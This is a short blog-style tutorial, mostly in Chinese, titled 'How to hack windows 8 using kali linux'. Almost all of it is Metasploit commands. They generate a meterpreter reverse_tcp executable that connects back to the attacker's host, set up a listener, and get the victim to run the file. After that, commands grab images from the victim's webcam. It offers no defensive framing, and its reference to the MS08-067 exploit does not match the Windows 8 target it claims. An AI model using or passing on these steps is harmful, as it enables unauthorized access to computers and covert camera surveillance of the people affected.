How to hack windows 8 using kali linux

  msfconsole

  show exploits

  use windows/smb/ms08_067_netapi

  show payloads

  2.msfpayload windows/meterpreter/reverse_tcp LHOST=YoursIP LPORT=4444 x > /root/Desktop/info.exe

  3.在linux的metasploit中执行

  use multi/handler

  set LHOST=YoursIP

  set LPORT=4444

  Exploit

  在win8运行生成的info.exe

  3.这时你发现victim连接上了攻击机

  4.用摄像头抓图

  webcam_list

  webcam_snap

  稍后截图自动打开

 

上一篇:安卓防火墙 PS DroidWall

下一篇:SSLSTrip--Usage